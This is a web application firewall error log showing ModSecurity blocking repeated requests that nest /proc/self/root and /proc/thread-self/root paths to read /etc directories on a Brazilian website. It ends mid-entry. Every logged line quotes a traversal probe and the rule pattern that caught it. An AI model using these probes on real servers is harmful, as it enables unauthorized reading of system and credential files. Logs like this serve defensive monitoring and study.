[Thu Mar 19 04:19:21.715467 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:32994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujeda6ubjKNq_cu4YLUgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:19:31.264839 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:33022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujg1_V7PWP6ixUYl6GrQAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:19:32.559945 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:36796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujhAkwaGbbGflqUZB-2gAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:19:39.368801 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:36808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuji9a6ubjKNq_cu4YLXgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:08.172966 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:57256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujqAbLMZ6AikZjR9UoQQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:10.650854 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:38180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujqvu8EFLIOrSqIptocgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:14.128310 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:38182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujrv-YZRR_7pZ7nDJYCwAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:25.173937 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:38190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujufu8EFLIOrSqIptojgAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:33.267551 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:36812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujweyqAr6etmhZHNoubQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:20:34.550985 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:48072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujwgkwaGbbGflqUZB_DgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:21:04.089990 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:48086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuj4AkwaGbbGflqUZB_LwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:21:10.067455 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:52642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuj5sdf6f5d65gmYZQ-FQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:21:11.398718 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:38146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuj5-oXxyEfFpUF8f_bWQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:21:15.176331 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:38156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuj6QkwaGbbGflqUZB_MwAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:21:51.888129 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:38166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukD-oXxyEfFpUF8f_bfgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:23:32.125070 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:39222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukdOyqAr6etmhZHNovCQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:23:40.052273 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:32914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukfBkFeYa1D6dYQnC4-wAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:23:42.578542 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:44710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukfgkwaGbbGflqUZB_eQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:23:46.847032 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:44714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukgvu8EFLIOrSqIptpBAAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:23:51.887046 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:33806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukh_u8EFLIOrSqIptpEQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:24:00.580648 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:33820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukkMdf6f5d65gmYZQ-gwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:24:03.319081 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:48190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] 